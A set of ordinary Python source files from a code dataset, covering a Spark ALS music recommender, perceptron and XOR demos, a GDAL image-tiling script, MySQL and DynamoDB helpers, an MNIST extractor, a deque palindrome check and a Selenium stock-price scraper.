plays\npredicted_plays.show(10)\n\n## TESTING THE MODEL\n\ntest_set = test_set.withColumn(\"Plays\", test_set[\"Plays\"].cast(DoubleType()))\npredict_df = my_model.transform(test_set)\n\n# Remove NaN values from prediction (due to SPARK-14489)\nTest_predictions = predict_df.filter(predict_df.prediction != float('nan'))\n\n# Round floats to whole numbers\nTest_predictions = Test_predictions.withColumn(\"prediction\", F.abs(F.round(Test_predictions[\"prediction\"],0)))\n# Run the previously created RMSE evaluator, reg_eval, on the predicted_test_df DataFrame\nTest_RMSE = reg_eval.evaluate(Test_predictions)\nprint('The model had a RMSE on the test set of {0}'.format(Test_RMSE))\n\n# Comparing the Model\navg_plays = train_set.groupBy().avg('Plays').select(F.round('avg(Plays)'))\navg_plays.show(3)\ntrain_avg_plays = avg_plays.collect()[0][0]\nprint('The average number of plays in the dataset is {0}'.format(train_avg_plays))\n\n# Add a column with the average rating\ntest_avg = test_set.withColumn('prediction', F.lit(train_avg_plays))\n\n# Run the previously created RMSE evaluator, reg_eval, on the test_for_avg_df DataFrame\ntest_avg_RMSE = reg_eval.evaluate(test_avg)\nprint(\"The RMSE on the average set is {0}\".format(test_avg_RMSE))\n\n## PREDICTION FOR AN USER\n\nUserID = 13\nsongs_listened = plays_df_2.filter(plays_df_2.user_als_id == UserID) \\\n .join(metadata_df, 'songId') \\\n .select('song_als_id', 'artist_name', 'title') \\\n \\\n# Generating List of Listened Songs\nlistened_songs_list = []\nfor song in songs_listened.collect():\n listened_songs_list.append(song['song_als_id'])\n\nprint('Songs user has listened to:')\nsongs_listened.select('artist_name', 'title').show()\n\n# generate dataframe of unlistened songs\nsongs_unlistened = plays_df_2.filter( ~ plays_df_2['song_als_id'].isin(listened_songs_list)) \\\n .select('song_als_id').withColumn('user_als_id', F.lit(UserID)).distinct()\n\n# feed unlistened songs into model\npredicted_listens = my_model.transform(songs_unlistened)\n\n# remove NaNs\npredicted_listens = predicted_listens.filter(predicted_listens['prediction'] != float('nan'))\n\n# print output\nprint('Predicted Songs:')\npredicted_listens.join(plays_df_2, 'song_als_id') \\\n .join(metadata_df, 'songId') \\\n .select('artist_name', 'title', 'prediction') \\\n .distinct() \\\n .orderBy('prediction', ascending=False) \\\n .show(10)\n\n## MAKING PREDICTIONS BASED ON 'SONGS LISTENED TO' AT LEAST TWICE\nplays_df_2more_plays = plays_df.join(user_als_id_LUT, 'userId') \\\n 
.join(song_als_id_LUT, 'songId') \\\n .filter(plays_df.Plays >= 2)\\\n .distinct()\n\ntotal_entries_2more = plays_df_2more_plays.count()\nprint('Total enties with two or more plays: {0}'.format(total_entries_2more))\n\nplays_df_2more_plays = plays_df_2more_plays.filter(plays_df_2more_plays.user_als_id < (unique_users)*0.8) \\\n .select('user_als_id', 'song_als_id', 'Plays')\nplays_df_2more_plays.cache()\n\n# We'll hold out 60% for training, 20% of our data for validation, and leave 20% for testing\nseed = 1800083193\n(split_01, split_02, split_03) = plays_df_2more_plays.randomSplit([0.6, 0.2, 0.2], seed = seed)\n\n# Let's cache these datasets for performance\ntrainset_2more = split_01.cache()\nvalidationset_2more = split_02.cache()\ntestset_2more = split_03.cache()\n\nprint('Training: {0}, validation: {1}, test: {2}\\n'.format(\n trainset_2more.count(), validationset_2more.count(), testset_2more.count())\n)\nvalidationset_2more = validationset_2more.withColumn(\"Plays\", validationset_2more[\"Plays\"].cast(DoubleType()))\ntest_2more = testset_2more.withColumn(\"Plays\", testset_2more[\"Plays\"].cast(DoubleType()))\n\ntrainset_2more.show(3)\nvalidationset_2more.show(3)\ntestset_2more.show(3)\n\n# Let's initialize our ALS learner\nals_2more = ALS()\n\n# Now set the parameters for the method\nals_2more.setMaxIter(2)\\\n .setSeed(seed)\\\n .setItemCol(\"song_als_id\")\\\n .setRatingCol(\"Plays\")\\\n .setUserCol(\"user_als_id\")\n\n# Now let's compute an evaluation metric for our test dataset\n# We Create an RMSE evaluator using the label and predicted columns\nreg_eval = RegressionEvaluator(predictionCol=\"prediction\", labelCol=\"Plays\", metricName=\"rmse\")\n\ntolerance = 0.03\nranks = [4, 8, 12, 16]\nregParams = [0.1, 0.15, 0.2, 0.25]\nerrors = [[0]*len(ranks)]*len(regParams)\nmodels = [[0]*len(ranks)]*len(regParams)\nerr = 0\nmin_error = float('inf')\nbest_rank = -1\ni = 0\nfor regParam in regParams:\n j = 0\n for rank in ranks:\n # Set the rank here:\n als_2more.setParams(rank = rank, regParam = regParam)\n # Create the model with these parameters.\n model = als_2more.fit(trainset_2more)\n # Run the model to create a prediction. 
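Both grid searches score models with RegressionEvaluator's rmse metric and then compare against a constant mean-plays baseline. A tiny numpy sketch of what those two numbers are; the play counts are made up:

import numpy as np

plays = np.array([1.0, 2.0, 2.0, 3.0, 12.0])
preds = np.array([1.0, 2.0, 3.0, 3.0, 9.0])

rmse = np.sqrt(np.mean((preds - plays) ** 2))
baseline_rmse = np.sqrt(np.mean((plays.mean() - plays) ** 2))
print(round(rmse, 3), round(baseline_rmse, 3))   # a useful model beats the baseline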
Predict against the validation_df.\n predict_df = model.transform(validationset_2more)\n\n # Remove NaN values from prediction (due to SPARK-14489)\n predicted_plays_df = predict_df.filter(predict_df.prediction != float('nan'))\n predicted_plays_df = predicted_plays_df.withColumn(\"prediction\", F.abs(F.round(predicted_plays_df[\"prediction\"],0)))\n # Run the previously created RMSE evaluator, reg_eval, on the predicted_ratings_df DataFrame\n error = reg_eval.evaluate(predicted_plays_df)\n errors[i][j] = error\n models[i][j] = model\n print ('For rank %s, regularization parameter %s the RMSE is %s' % (rank, regParam, error))\n if error < min_error:\n min_error = error\n best_params = [i,j]\n j += 1\n i += 1\n\nals_2more.setRegParam(regParams[best_params[0]])\nals_2more.setRank(ranks[best_params[1]])\nprint ('The best model was trained with regularization parameter %s' % regParams[best_params[0]])\nprint ('The best model was trained with rank %s' % ranks[best_params[1]])\nmy_model_2more = models[best_params[0]][best_params[1]]\n\n#Testing the Model on the Test_2more Dataset\npredict_2more = my_model_2more.transform(test_2more)\n\n# Remove NaN values from prediction (due to SPARK-14489)\npredicted_test_2more = predict_2more.filter(predict_2more.prediction != float('nan'))\n\n# Round floats to whole numbers\npredicted_test_2more = predicted_test_2more.withColumn(\"prediction\", F.abs(F.round(predicted_test_2more[\"prediction\"],0)))\n# Run the previously created RMSE evaluator, reg_eval, on the predicted_test_df DataFrame\ntest2more_RMSE = reg_eval.evaluate(predicted_test_2more)\n\nprint('The model had a RMSE on the test set of {0}'.format(test2more_RMSE))\n\n#Comparing the Model\n##We again compare to selecting the average number of plays from the training dataset\navg_plays_2more = trainset_2more.groupBy().avg('Plays').select(F.round('avg(Plays)'))\n\navg_plays_2more.show(3)\n# Extract the average rating value. 
(This is row 0, column 0.)\ntrain_avg_plays2more = avg_plays_2more.collect()[0][0]\n\nprint('The average number of plays in the dataset is {0}'.format(train_avg_plays2more))\n\n# Add a column with the average rating\ntest_for_avg_2more = test_2more.withColumn('prediction', F.lit(train_avg_plays2more))\n\n# Run the previously created RMSE evaluator, reg_eval, on the test_for_avg_df DataFrame\ntest_avg_RMSE_2more = reg_eval.evaluate(test_for_avg_2more)\n\nprint(\"The RMSE on the average set is {0}\".format(test_avg_RMSE_2more))\n\n#PREDICTION FOR THE USER - 02\nUserID = 13\nsongs_listened = plays_df_2.filter(plays_df_2.user_als_id == UserID) \\\n .join(metadata_df, 'songId') \\\n .select('song_als_id', 'artist_name', 'title') \\\n \\\n# Generating List of Listened Songs\nlistened_songs_list = []\nfor song in songs_listened.collect():\n listened_songs_list.append(song['song_als_id'])\n\nprint('Songs user has listened to:')\nsongs_listened.select('artist_name', 'title').show()\n\n# generate dataframe of unlistened songs\nsongs_unlistened = plays_df_2.filter( ~ plays_df_2['song_als_id'].isin(listened_songs_list)) \\\n .select('song_als_id').withColumn('user_als_id', F.lit(UserID)).distinct()\n\n# feed unlistened songs into model\npredicted_listens = my_model_2more.transform(songs_unlistened)\n\n# remove NaNs\npredicted_listens = predicted_listens.filter(predicted_listens['prediction'] != float('nan'))\n\n# print output\nprint('Predicted Songs:')\npredicted_listens.join(plays_df_2, 'song_als_id') \\\n .join(metadata_df, 'songId') \\\n .select('artist_name', 'title', 'prediction') \\\n .distinct() \\\n .orderBy('prediction', ascending=False) \\\n .show(10)\n","sub_path":"Final_ALS_Model.py","file_name":"Final_ALS_Model.py","file_ext":"py","file_size_in_byte":15787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"644059178","text":"#!/usr/bin/env python\n\"\"\"\n @author: Jean-Lou Dupont\n\"\"\"\n__author__ = \"Jean-Lou Dupont\"\n__fileid__ = \"$Id: setup.py 39 2009-04-03 16:57:56Z jeanlou.dupont $\"\n__email = \"python (at) jldupont.com\"\n\nimport os\nimport sys\nfrom setuptools import setup, find_packages\n\nfrom pyjld.builder import findPackage, getShortAndLongDescription\n\n#helps with Eclipse external buidler\n__file__dir = os.path.dirname( __file__ )\nos.chdir(__file__dir)\n\npkg_path, ns, package = findPackage(__file__dir)\nthis_module_name = \"%s.%s\" % (ns, package)\nthis_package = __import__( this_module_name )\nthis_module = getattr(this_package, package)\nversion = this_module.__version__\n\nshort_description, long_description = getShortAndLongDescription(this_module) \n\n_doc_url = \"http://pyjld.googlecode.com/svn/trunk/%s.%s/tags/%s/docs/index.html\" % (ns,package,version)\n\ndist = setup(\n name = this_module_name,\n description = short_description,\n author_email = __email,\n author = __author__,\n url = _doc_url,\n long_description = long_description,\n version = this_module.__version__,\n package_data = {'':['*.*']},\n namespace_packages=[ns],\n package_dir = {'':'src'},\n packages = find_packages('src'),\n classifiers = this_module.__classifiers,\n install_requires = this_module.__dependencies,\n tests_require = [],\n #test_suite = ['tests.suite'],\n zip_safe = True,\n)\n\n","sub_path":"pyjld.phidgets/trunk/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"502534182","text":"#\n# 
tflite_webcam_image.py\n#\n# OpenCV - image capture and image manipulation \n# TensorFlow Lite - object classification using coco_ssd_mobilenet_v1_1.0 model\n# Kafka - send inferred meta data and annotated image to event stream\n#\n# Sanjeev Gupta, April 2020\n#\n\nimport os\nimport time\n\nfrom package import Config\nfrom package import Detector\nfrom package import OpenCV\nfrom package import VideoStream\nfrom package import util\n\nconfig = Config(resolution=(640, 480), framerate=30)\ndetector = Detector(config)\nopencv = OpenCV()\nvideostream = VideoStream(config).start()\n\n# Start mmsPoller in a different thread\nconfig.mmsPoller()\n\ntime.sleep(1)\n\nwhile True:\n # Get a frame in different states\n frame_current, frame_normalized, frame_faces, frame_gray = opencv.getFrame(config, detector, videostream)\n\n # Perform the actual inferencing with the initilized detector . tflite\n inference_interval = detector.infer(frame_normalized)\n\n # Get results\n boxes, classes, scores, num = detector.getResults()\n \n # Annotate the frame with class boundaries\n entities_dict = opencv.updateFrame(config, detector, opencv, frame_current, frame_faces, frame_gray, boxes, classes, scores, num)\n \n # Get full payload in json\n inference_data_json = detector.getInferenceDataJSON(config, inference_interval, entities_dict, frame_current)\n\n # Publish the result to kafka event stream\n if config.shouldPublishKafka():\n util.inference_publish(config.getPublishPayloadKafkaUrl(), inference_data_json)\n\n if config.shouldPublishStream():\n util.inference_publish(config.getPublishPayloadStreamUrl(), inference_data_json)\n\n # Update framerate\n opencv.updateFrameRate()\n\nvideostream.stop()\n","sub_path":"src/tflite/service/tflite_webcam_image.py","file_name":"tflite_webcam_image.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"92620684","text":"import numpy as np\n\n# \n\ndef unit_step(v):\n \"\"\" Heavyside Step function. v must be a scalar \"\"\"\n if v >= 0:\n return 1\n else:\n return 0\n\ndef perceptron(x, w, b):\n# Function implemented by a perceptron with \n# weight vector w and bias b \"\"\"\n v = np.dot(w, x) + b\n y = unit_step(v)\n return y\n\ndef NOT_percep(x):\n return perceptron(x, w=-1, b=0.5)\n\ndef AND_percep(x):\n w = np.array([1, 1])\n b = -1.5\n return perceptron(x, w, b)\n\ndef NAND_percep(x):\n w = np.array([-1, -1])\n b = 1.5\n return perceptron(x, w, b)\n\n\ndef OR_percep(x):\n w = np.array([1, 1])\n b = -0.5\n return perceptron(x, w, b)\n\ndef XOR_net(x):\n gate_1 = NAND_percep(x)\n combine0 = np.array( [x[0],gate_1])\n\n gate_2 = NAND_percep(combine0)\n combine1 = np.array( [x[1],gate_1])\n\n gate_3 = NAND_percep(combine1)\n combine3 = np.array([gate_2, gate_3])\n\n output = NAND_percep(combine3)\n return output\n\n\n# Test\nexample1 = np.array([1, 1])\nexample2 = np.array([1, 0])\nexample3 = np.array([0, 1])\nexample4 = np.array([0, 0])\n\nprint(\"XOR({}, {}) = {}\".format(1, 1, XOR_net(example1)))\nprint(\"XOR({}, {}) = {}\".format(1, 0, XOR_net(example2)))\nprint(\"XOR({}, {}) = {}\".format(0, 1, XOR_net(example3)))\nprint(\"XOR({}, {}) = {}\".format(0, 0, XOR_net(example4)))\n","sub_path":"perceptrons/xor-from-nand.py","file_name":"xor-from-nand.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"354426788","text":"# %%\n\"\"\"\n
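The xor-from-nand record above builds XOR out of four NAND perceptrons. A plain-Python sketch of the same four-gate wiring, checked against the ^ operator over the full truth table:

import itertools

def NAND(a, b):
    return int(not (a and b))

def XOR(a, b):
    g1 = NAND(a, b)                    # same wiring as XOR_net above
    return NAND(NAND(a, g1), NAND(b, g1))

for a, b in itertools.product([0, 1], repeat=2):
    assert XOR(a, b) == (a ^ b)
print("four-NAND XOR matches a ^ b on all inputs")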
Perceptron implementation
\nby Vip Lab 116 - EE Dept. NCNU TW\n\"\"\"\n\n# %%\n\"\"\"\nnumpy lets us create vectors, and gives us both linear algebra functions and python list-like methods to use with it. We access its functions by calling them on np.\n\"\"\"\n\n# %%\nimport numpy as np\n\n# %%\n\"\"\"\nHere, we’re creating a new class Perceptron. This will, among other things, allow us to maintain state in order to use our perceptron after it has learned and assigned values to its weights.\n1. __init__ method
\nno_of_inputs is used to determine how many weights we need to learn.
\nthreshold is the number of epochs we’ll allow our learning algorithm to iterate through before ending; it’s defaulted to 100.
\nlearning_rate is used to determine the magnitude of change for our weights during each step through our training data; it’s defaulted to 0.01.
\nWe initialize the weight vector with n+1 zeros (the extra entry is the bias).
\n\n2. __predict__ method
\nf(x) = 1 if w · x + b > 0, else 0
\ndot product function: np.dot(a, b) == a · b
\nIf the summation from above is greater than 0, we store 1 in the variable activation; otherwise activation = 0. We then return that value.
\n\n3. __train__ method, which takes two arguments: training_inputs and labels
\nlabels is expected to be a numpy array of expected output values for each of the corresponding inputs in the training_inputs list.
\n\n\n\n\"\"\"\n\n# %%\nclass Perceptron(object):\n def __init__(self, no_of_inputs, threshold=100, learning_rate=0.01):\n self.threshold = threshold\n self.learning_rate = learning_rate\n self.weights = np.zeros(no_of_inputs + 1)\n \n def predict(self, inputs):\n summation = np.dot(inputs, self.weights[1:]) + self.weights[0]\n if summation > 0:\n activation = 1\n else:\n activation = 0 \n return activation\n \n def train(self, training_inputs, labels):\n for _ in range(self.threshold):\n for inputs, label in zip(training_inputs, labels):\n prediction = self.predict(inputs)\n self.weights[1:] += self.learning_rate * (label - prediction) * inputs\n self.weights[0] += self.learning_rate * (label - prediction)","sub_path":"W12-Perceptron/.ipynb_checkpoints/perceptron-checkpoint.py","file_name":"perceptron-checkpoint.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"166958271","text":"#!/usr/bin/python3\n\nimport os\nimport glob\nimport shutil\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom osgeo import gdal\n\nfrom cnn_exceptions import DatasetError\n\n\ndef read_images(data_dir, tensor_shape=(256, 256),\n filter_by_class=None, verbose=1):\n \"\"\"Read images and return them as tensors and lists of filenames.\n\n :param data_dir: path to the directory containing images\n :param tensor_shape: shape of the first two dimensions of input tensors\n :param verbose: verbosity (0=quiet, >0 verbose)\n :param filter_by_class: classes of interest (if specified, only samples\n containing at least one of them will be created)\n :return: image_tensors, masks_tensors\n \"\"\"\n images_arrays = []\n masks_arrays = []\n for i in glob.glob(os.path.join(data_dir, '*image.tif')):\n tiled = tile(i, i.replace('image.tif', 'label.tif'),\n tensor_shape, filter_by_class)\n images_arrays.extend(tiled[0])\n masks_arrays.extend(tiled[1])\n\n if len(images_arrays) == 0:\n raise DatasetError('No training samples created. 
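A usage sketch for the Perceptron class defined above, training it as an AND gate; the default threshold and learning rate are kept, and the data is the standard two-input truth table:

import numpy as np

training_inputs = [np.array(x) for x in ([1, 1], [1, 0], [0, 1], [0, 0])]
labels = np.array([1, 0, 0, 0])            # AND gate targets

p = Perceptron(no_of_inputs=2)
p.train(training_inputs, labels)
print(p.predict(np.array([1, 1])))         # 1
print(p.predict(np.array([0, 1])))         # 0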
Check the size of '\n 'the images in the data_dir or the appearance of '\n 'the classes you are interested in in labels')\n\n if masks_arrays[0].ndim == 2:\n masks_arrays = [np.expand_dims(i, -1) for i in masks_arrays]\n\n # create TF datasets\n images_dataset = tf.data.Dataset.from_tensor_slices(images_arrays)\n masks_dataset = tf.data.Dataset.from_tensor_slices(masks_arrays)\n\n im_nr = len(images_arrays)\n if verbose > 0:\n print('Created {} training samples from the provided '\n 'image.'.format(im_nr))\n\n return images_dataset, masks_dataset\n\n\ndef parse_label_code(line):\n \"\"\"Parse lines in a text file into a label code and a label name.\n\n :param line: line in the txt file\n :return: tuple with an integer label code, a string label name\n \"\"\"\n a, b = line.strip().split(',')\n\n # format label_value, label_name\n return int(a), b\n\n\ndef generate_dataset_structure(data_dir, nr_bands=12, tensor_shape=(256, 256),\n val_set_pct=0.2, filter_by_class=None,\n verbose=1):\n \"\"\"Generate the expected dataset structure.\n\n Will generate directories train_images, train_masks, val_images and\n val_masks.\n\n :param data_dir: path to the directory containing images\n :param nr_bands: number of bands of intended input images\n :param tensor_shape: shape of the first two dimensions of input tensors\n :param val_set_pct: percentage of the validation images in the dataset\n :param filter_by_class: classes of interest (if specified, only samples\n containing at least one of them will be created)\n :param verbose: verbosity (0=quiet, >0 verbose)\n \"\"\"\n # function to be used while saving samples\n def train_val_determination(val_set_pct):\n \"\"\"Return decision about the sample will be part of train or val set.\"\"\"\n pct = 0\n while True:\n pct += val_set_pct\n if pct < 1:\n yield 'train'\n else:\n pct -= 1\n yield 'val'\n\n # Create folders to hold images and masks\n dirs = ['train_images', 'train_masks', 'val_images', 'val_masks']\n\n for directory in dirs:\n dir_full_path = os.path.join(data_dir, directory)\n if os.path.isdir(dir_full_path):\n shutil.rmtree(dir_full_path)\n\n os.makedirs(dir_full_path)\n\n images, masks = read_images(data_dir, tensor_shape, filter_by_class)\n\n # TODO: would be nice to avoid tf.compat.v1 (stay v2) (what about my\n # generator?)\n # Create iterators for images and masks\n # outside of TF Eager, we would use make_one_shot_iterator\n frame_batches = tf.compat.v1.data.make_one_shot_iterator(images)\n mask_batches = tf.compat.v1.data.make_one_shot_iterator(masks)\n\n driver = gdal.GetDriverByName('GTiff')\n\n # Iterate over the images while saving the images and masks\n # in appropriate folders\n im_id = 0\n dir_names = train_val_determination(val_set_pct)\n for image, mask in zip(frame_batches, mask_batches):\n # TODO: Experiment with uint16\n # Convert tensors to numpy arrays\n image = (image.numpy() / 255).astype(np.uint8)\n mask = mask.numpy().astype(np.uint8)\n\n # TODO: Avoid two transpositions\n image = np.transpose(image, (2, 0, 1))\n mask = np.transpose(mask, (2, 0, 1))\n # TODO: https://stackoverflow.com/questions/53776506/how-to-save-an-array-representing-an-image-with-40-band-to-a-tif-file\n\n dir_name = next(dir_names)\n image_path = os.path.join(data_dir,\n '{}_images'.format(dir_name),\n 'image_{0:03d}.tif'.format(im_id + 1))\n mask_path = os.path.join(data_dir,\n '{}_masks'.format(dir_name),\n 'image_{0:03d}.tif'.format(im_id + 1))\n\n # write rasters\n dout = driver.Create(image_path, tensor_shape[0],\n tensor_shape[1], nr_bands, 
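generate_dataset_structure above writes each sample to GeoTIFF band by band with GDAL. A stripped-down sketch of that write loop, assuming the GDAL Python bindings are available; the array size, band count, and output path are illustrative:

import numpy as np
from osgeo import gdal

arr = np.zeros((3, 64, 64), dtype=np.uint16)        # (bands, rows, cols)
driver = gdal.GetDriverByName('GTiff')
dout = driver.Create('/tmp/sample.tif', 64, 64, 3, gdal.GDT_UInt16)
for band in range(3):
    dout.GetRasterBand(band + 1).WriteArray(arr[band])
dout = None                                          # dereference to flush to disk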
gdal.GDT_UInt16)\n for i in range(nr_bands):\n dout.GetRasterBand(i + 1).WriteArray(image[i])\n\n dout = driver.Create(mask_path, tensor_shape[0],\n tensor_shape[1], 1, gdal.GDT_UInt16)\n for i in range(1):\n dout.GetRasterBand(i + 1).WriteArray(mask[i])\n\n im_id += 1\n\n if verbose > 0:\n print(\"Saved {} images to directory {}\".format(im_id, data_dir))\n\n\ndef tile(scene_path, labels_path, tensor_shape, filter_by_class=None):\n \"\"\"Tile the big scene into smaller samples.\n\n If filter_by_class is not None, only samples containing at least one of\n these classes of interest will be returned.\n\n :param scene_path: path to the image to be cut\n :param labels_path: path to the image with labels to be cut\n :param tensor_shape: shape of the first two dimensions of input tensors\n :param filter_by_class: classes of interest (if specified, only samples\n containing at least one of them will be returned)\n :return:\n \"\"\"\n import pyjeo as pj\n\n # do we filter by classes?\n if filter_by_class is None:\n filt = False\n else:\n filter_by_class = [int(i) for i in filter_by_class.split(',')]\n filt = True\n\n scene_nps = []\n labels_nps = []\n\n # load images\n scene = pj.Jim(scene_path)\n labels = pj.Jim(labels_path)\n\n nr_col = scene.properties.nrOfCol()\n nr_row = scene.properties.nrOfRow()\n cols_step = tensor_shape[0]\n rows_step = tensor_shape[1]\n\n for i in range(0, nr_col, cols_step):\n for j in range(0, nr_row, rows_step):\n # if reaching the end of the image, expand the window back to\n # avoid pixels outside the image\n if j + rows_step > nr_row:\n j = nr_row - rows_step\n if i + cols_step > nr_col:\n i = nr_col - cols_step\n\n # crop images\n scene_cropped = pj.geometry.crop(scene, ulx=i, uly=j,\n lrx=i + cols_step,\n lry=j + rows_step,\n nogeo=True)\n labels_cropped = pj.geometry.crop(labels, ulx=i, uly=j,\n lrx=i + cols_step,\n lry=j + rows_step,\n nogeo=True)\n\n if filt is False or \\\n any(i in labels_cropped.np() for i in filter_by_class):\n # stack bands\n scene_np = np.stack(\n [scene_cropped.np(i) for i in\n range(scene_cropped.properties.nrOfBand())],\n axis=2)\n labels_np = pj.jim2np(labels_cropped)\n\n scene_nps.append(scene_np)\n labels_nps.append(labels_np)\n\n return scene_nps, labels_nps\n","sub_path":"src/data_preparation.py","file_name":"data_preparation.py","file_ext":"py","file_size_in_byte":8084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"607771064","text":"import pymysql\nimport pandas as pd\nimport datetime\ndata = pd.read_table('weekendDate.txt',sep='\\s+', encoding = 'gb2312')\n\n#%%\n#将获取到的数据插入数据库\n# 连接database\nconn = pymysql.connect(host=\"localhost\", user=\"root\",password=\"123456\",database=\"shixi\",charset=\"utf8\")\n# 得到一个可以执行SQL语句的光标对象\ncursor = conn.cursor(cursor=pymysql.cursors.DictCursor)\n#如果没有数据表要进行生成\nsql_create1 =\" CREATE TABLE IF NOT EXISTS `WeekendSpecial`\\\n (\\\n `title` VARCHAR(100) NOT NULL,\\\n `detail` VARCHAR(40) NOT NULL,\\\n `herf` VARCHAR(100) NOT NULL,\\\n `upgrade_date` DATE\\\n )\\\n ENGINE=InnoDB DEFAULT CHARSET=utf8;\"\ncursor.execute(sql_create1)\n#批量插入数据\nsql_country = \"INSERT INTO WeekendSpecial VALUES (%s, %s, %s, %s)\"\nfor i in range(len(data)):\n a = data['Title'][i]\n b = data['Detail'][i]\n c = data['herf'][i]\n d = datetime.datetime.now().strftime('%Y-%m-%d')\n values = (a, b, c, d)#在从也可以进行插入数据格式修改\n cursor.execute(sql_country,values)\n#在插入完数据之后,将最近跟新的数据覆盖掉之前有的数据,也就是查找重复,如果时间越早则删除记录\nconn.commit()\nsql_delete_weekend=\" delete from 
WeekendSpecial where (title,upgrade_date) in (select title,n from(select title,min(upgrade_date)as n,count(*) as c from WeekendSpecial group by `title` having c>1)as t)"\ncursor.execute(sql_delete_weekend)\n# 执行SQL语句\nconn.commit()\n# 关闭光标对象\ncursor.close()\n# 关闭数据库连接\nconn.close()\nprint('done')","sub_path":"周末专题/sqlWrite.py","file_name":"sqlWrite.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"168536072","text":"from . import DynamoDBApi\nfrom . import agentConfig\n\n\nclass ConfigController:\n    def __init__(self):\n        self.__agent = agentConfig.agent\n        self.__dynamodbApi = DynamoDBApi.DynamoDBApi()\n\n    def updateAiConfig(self,aiConfigData):\n        aiDynamoDbConfigData = {\n            \"agent\":self.__agent,\n            \"aiApp\":aiConfigData['aiApp'],\n            \"key\":aiConfigData['key'],\n            \"value\":aiConfigData['value']\n        }\n\n        self.__dynamodbApi.updateAiDynamoDbConfig(aiDynamoDbConfigData)\n\n    def retrieveAiConfig(self,aiApp):\n        aiConfigData = self.__dynamodbApi.retrieveAiConfig(self.__agent, aiApp)\n        return aiConfigData","sub_path":"module/ConfigController.py","file_name":"ConfigController.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"487655807","text":"import os\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nimport cv2\nimport numpy as np\n\n\nmnist = input_data.read_data_sets('MNIST_data/', one_hot=False)\n\n\ndef extract_mnist_data(xx='train', num=30):\n    if xx == 'train':\n        images = mnist.train.images\n        labels = mnist.train.labels\n    elif xx == 'test':\n        images = mnist.test.images\n        labels = mnist.test.labels\n    else:\n        print('error!')\n        return\n\n    sess = tf.Session()\n    # get the total number of images\n    shape_images = sess.run(tf.shape(images))\n    images_count = shape_images[0]\n    pixels_per_image = shape_images[1]\n    # get the total number of labels\n    shape_labels = sess.run(tf.shape(labels))\n    labels_count = shape_labels[0]\n    # check that the dataset matches the expected format\n    assert images_count == labels_count\n    assert shape_labels.size == 1\n\n    print('the dataset contains: {} images, {} labels'.format(images_count, labels_count))\n    print('each image contains: {} pixels'.format(pixels_per_image))\n    print('the data type is: {}'.format(images.dtype))\n\n    images_data = images[0:num][:]\n    labels_data = labels[0:num]\n\n    # create the directories where the digit images are saved\n    save_dir = 'MNIST_images/' + xx\n    for i in range(10):\n        dir_img = '{}/{}/'.format(save_dir, i)\n        if not os.path.exists(dir_img):\n            print(\"directory '{}' does not exist! creating it automatically...\".format(dir_img))\n            os.makedirs(dir_img)\n\n    # generate the image files\n    for i in range(num):\n        img_1d = images_data[i] * 255\n        img_2d = img_1d.reshape(28, 28)\n\n        dir_img = '{}/{}/'.format(save_dir, labels_data[i])\n        name_img = '{}.jpg'.format(i)\n\n        cv2.imwrite(dir_img + name_img, img_2d)\n\nextract_mnist_data('train')\nextract_mnist_data('test')","sub_path":"tensorflow/tl00_mnist_img_extract.py","file_name":"tl00_mnist_img_extract.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"58175779","text":"from Dequeue import *\n\ndq = DeQueue()\n\nstri = input(\"Enter a string\")\ntoChar = list(stri)\nfor i in toChar:\n    dq.add_Rear(i)\nprint(toChar)\ndq.show()\nsize = len(toChar)\nj=0\nflag = 1\n# size//2 pairs of characters have to match; the middle character of an\n# odd-length string needs no partner, so both parities use the same bound\nsh = size//2 - 1\n\n
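# a palindrome reads the same from both ends, so pop one character from\n# the front and one from the rear on every pass and compare them\nwhile j<=sh:\n    front = dq.rem_Front()\n    print(front,\"removed\", end=\" \")\n    rear = dq.remv_Rear()\n    print(rear,\"removed\")\n    dq.show()\n\n    if front == rear:\n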
        flag = 1\n    else:\n        flag = 0\n        break\n    j = j + 1\n\nif flag == 1:\n    print(\"String is palindrome\")\nelse:\n    print(\"String is not palindrome\")\n\n\n","sub_path":"Week2/palindromeQueue.py","file_name":"palindromeQueue.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"314220532","text":"# -*- coding: utf-8 -*-\r\nimport lxml.html\r\nimport traceback\r\nfrom selenium import webdriver\r\nfrom time import sleep\r\n\r\nUrl = 'https://stocks.finance.yahoo.co.jp/'\r\nstock_code=['1301','7201','7203','998407']\r\n\r\ndriver = webdriver.Chrome(executable_path=\"./chromedriver.exe\")\r\ndriver.get(Url)  # fetch the web page\r\n\r\ntry:\r\n    for stock in stock_code:\r\n        search_txt = driver.find_element_by_id(\"searchText\")\r\n        search_btn = driver.find_element_by_id(\"searchButton\")\r\n        search_txt.send_keys(stock)  # type the ticker code into the search input box\r\n        search_btn.click()  # press the search button\r\n\r\n        sleep(2)  # wait for the page to switch (2 seconds for now)\r\n        root = lxml.html.fromstring(driver.page_source)  # grab the page from Selenium and convert it with the parser\r\n\r\n        company_name = root.xpath(\"//h1/text()\")[0]\t\t\t\t# company name\r\n        stock_price = root.xpath(\"//td[@class='stoksPrice']/text()\")[0]\t\t# stock price\r\n        print(company_name)\r\n        print(stock_price)\r\nexcept:\r\n    print(traceback.format_exc())\r\nfinally:\r\n    driver.close()\r\n    